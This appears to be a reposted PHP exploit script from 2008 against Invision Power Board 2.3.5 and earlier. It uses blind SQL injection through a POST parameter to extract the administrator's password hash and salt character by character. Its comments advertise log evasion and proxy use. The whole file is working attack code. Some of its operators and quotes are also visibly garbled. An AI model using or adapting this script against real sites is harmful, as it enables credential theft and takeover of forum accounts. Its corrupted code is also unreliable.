DESlock

<?php

error_reporting(E_ALL);

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

// IPB <= 2.3.5 sql injection exploit

// Version 1.0

// written by Janek Vind "waraxe"

// Estonia, Tartu

// http://www.waraxe.us/

// 20. september 2008

// based on DarkFig\’s advisory

// http://acid-root.new.fr/?0:18

//

// FEATURES:

// 1. Fetching algorithm optimized for speed

// 2. Attack goes through $_POST, so no suspicious logs

// 3. Pretesting saves time if IPB is not vulnerable

//

// More useful tools: http://www.waraxe.us/tools/

// Waraxe forums: http://www.waraxe.us/forums.html

//

// NB! This exploit is meant to be run as php CLI!

// http://www.php.net/features.commandline

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

//=====================================================================

$url = \’http://localhost/ipb.2.3.5/\’;

$id = 1;// ID of the target user, default value "1" is admin\’s ID

$prefix = \’ibf_\’;// IPB table prefix, default is "ibf_"

# Proxy settings

# Be sure to use proxy 🙂

//$proxy_ip_port = \’127.0.0.1:8118\’;

//$proxy_user_password = \’someuser:somepassword\’;

$outfile = \’./ipblog.txt\’;// Log file

//======================================================================

///////////////////////////////////////////////////////////////////////

// Don\’t mess below this line, unless you know the stuff 😉

///////////////////////////////////////////////////////////////////////

//=====================================================================

///////////////////////////////////////////////////////////////////////

$cli = php_sapi_name() === \’cli\’;

//=====================================================================

// Warning, if executed from webserver

//=====================================================================

if(!$cli)

{

if(!isset($_REQUEST[\’wtf-is-cli\’]))

{

echo "<html><head><title>Attention!</title></head>\\n";

echo "<body><br /><br /><center>\\n";

echo "<h1>Warning!</h1>\\n";

echo "This exploit is meant to be used as php CLI script!<br />\\n";

echo "More information:<br />\\n";

echo "<a href=\\"http://www.google.com/search?hl=en&q=php cli windows\\" target=\\"_blank\\">http://www.google.com/search?hl=en&q=php cli windows</a><br />\\n";

echo "Still, you can try to run it from webserver.<br />\\n";

echo "Just press the button below and prepare for long waiting<br />\\n";

echo "And learn to use php CLI next time, please …<br />\\n";

echo "<form method=\\"get\\">\\n";

echo "<input type=\\"submit\\" name=\\"wtf-is-cli\\" value=\\"Let me in, i don\’t care\\">\\n";

echo "</form>\\n";

echo "</center></body></html>\\n";

exit;

}

else

{

// Let\’s try to maximize our chances without CLI

@set_time_limit(0);

}

}

//=====================================================================

xecho("Target: $url\\n");

xecho("Sql table prefix: $prefix\\n");

xecho("Testing target URL … \\n");

test_target_url();

xecho("Target URL seems to be valid\\n");

xecho("Testing target ID … \\n");

test_target_id();

xecho("Target ID seems to be valid\\n");

$hash = get_hash();

$salt = get_salt();

add_line("Target: $url");

add_line("User ID: $id");

add_line("Hash: $hash");

add_line("Salt: $salt");

add_line("——————————————");

xecho("\\n——————————————\\n");

xecho("Hash: $hash\\n");

xecho("Salt: $salt");

xecho("\\n——————————————\\n");

xecho("\\nQuestions and feedback – http://www.waraxe.us/ \\n");

die("See ya! 🙂 \\n");

//////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////

function test_target_url()

{

global $url;

$post = \’act=xmlout&do=check-display-name&name=somethingfoobarkind%27 OR 1=1– \’;

$buff = trim(make_post($url, $post, \’\’, $url));

if($buff !== \’found\’)

{

die(\’Invalid response, target URL not valid? Exiting …\’);

}

}

//////////////////////////////////////////////////////////////////////

function test_target_id()

{

global $url, $prefix, $id;

$post = \’UNION SELECT 1,1 FROM \’ . $prefix . \’members_converge WHERE converge_id=\’ . $id . \’ AND LENGTH(converge_pass_hash)=32\’;

if(!test_condition($post))

{

die(\’Invalid response, target ID not valid? Exiting …\’);

}

}

///////////////////////////////////////////////////////////////////////

function get_salt()

{

$len = 5;

$out = \’\’;

xecho("Finding salt …\\n");

for($i = 1; $i < $len 1; $i )

{

$ch = get_saltchar($i);

xecho("Got pos $i –> $ch\\n");

$out .= "$ch";

xecho("Current salt: $out \\n");

}

xecho("\\nFinal salt: $out\\n\\n");

return $out;

}

///////////////////////////////////////////////////////////////////////

function get_saltchar($pos)

{

global $prefix, $id;

$char = \’\’;

$min = 32;

$max = 128;

$pattern = \’UNION SELECT 1,1 FROM \’ . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";

$curr = 0;

while(1)

{

$area = $max – $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);

if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}

break;

}

$half = intval(floor($area / 2));

$curr = $min $half;

$post = $pattern . \’%3e\’ . $curr;

$bigger = test_condition($post);

if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}

xecho("Current test: $curr-$max-$min\\n");

}

return $char;

}

///////////////////////////////////////////////////////////////////////

function get_hash()

{

$len = 32;

$out = \’\’;

xecho("Finding hash …\\n");

for($i = 1; $i < $len 1; $i )

{

$ch = get_hashchar($i);

xecho("Got pos $i –> $ch\\n");

$out .= "$ch";

xecho("Current hash: $out \\n");

}

xecho("\\nFinal hash: $out\\n\\n");

return $out;

}

///////////////////////////////////////////////////////////////////////

function get_hashchar($pos)

{

global $prefix, $id;

$char = \’\’;

$pattern = \’UNION SELECT 1,1 FROM \’ . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

// First let\’s determine, if it\’s number or letter

$post = $pattern . \’%3e57\’;

$letter = test_condition($post);

if($letter)

{

$min = 97;

$max = 102;

xecho("Char to find is [a-f]\\n");

}

else

{

$min = 48;

$max = 57;

xecho("Char to find is [0-9]\\n");

}

$curr = 0;

while(1)

{

$area = $max – $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);

if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}

break;

}

$half = intval(floor($area / 2));

$curr = $min $half;

$post = $pattern . \’%3e\’ . $curr;

$bigger = test_condition($post);

if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}

xecho("Current test: $curr-$max-$min\\n");

}

return $char;

}

///////////////////////////////////////////////////////////////////////

function test_condition($p)

{

global $url;

$bret = false;

$maxtry = 10;

$try = 1;

$pattern = \’act=xmlout&do=check-display-name&name=%%27 OR 1=%%22%%27%%22 %s OR 1=%%22%%27%%22– \’;

$post = sprintf($pattern, $p);

while(1)

{

$buff = trim(make_post($url, $post, \’\’, $url));

if($buff === \’found\’)

{

$bret = true;

break;

}

elseif($buff === \’notfound\’)

{

break;

}

elseif(strpos($buff, \'<title>IPS Driver Error</title>\’) !== false)

{

die("Sql error! Wrong prefix?\\nExiting … ");

}

else

{

xecho("test_condition() – try $try – invalid return value …\\n");

$try ;

if($try > $maxtry)

{

die("Too many tries – exiting …\\n");

}

else

{

xecho("Trying again – try $try …\\n");

}

}

}

return $bret;

}

///////////////////////////////////////////////////////////////////////

function make_post($url, $post_fields=\’\’, $cookie = \’\’, $referer = \’\’, $headers = FALSE)

{

$ch = curl_init();

$timeout = 120;

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt ($ch, CURLOPT_USERAGENT, \’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)\’);

if(!empty($GLOBALS[\’proxy_ip_port\’]))

{

curl_setopt($ch, CURLOPT_PROXY, $GLOBALS[\’proxy_ip_port\’]);

if(!empty($GLOBALS[\’proxy_user_password\’]))

{

curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS[\’proxy_user_password\’]);

}

}

if(!empty($cookie))

{

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

}

if(!empty($referer))

{

curl_setopt ($ch, CURLOPT_REFERER, $referer);

}

if($headers === TRUE)

{

curl_setopt ($ch, CURLOPT_HEADER, TRUE);

}

else

{

curl_setopt ($ch, CURLOPT_HEADER, FALSE);

}

$fc = curl_exec($ch);

curl_close($ch);

return $fc;

}

///////////////////////////////////////////////////////////////////////

function add_line($line)

{

global $outfile;

$line .= "\\n";

$fh = fopen($outfile, \’ab\’);

fwrite($fh, $line);

fclose($fh);

}

///////////////////////////////////////////////////////////////////////

function xecho($line)

{

if($GLOBALS[\’cli\’])

{

echo "$line";

}

else

{

$line = nl2br(htmlspecialchars($line));

echo "$line";

}

}

//////////////////////////////////////////////////////////////////////

?>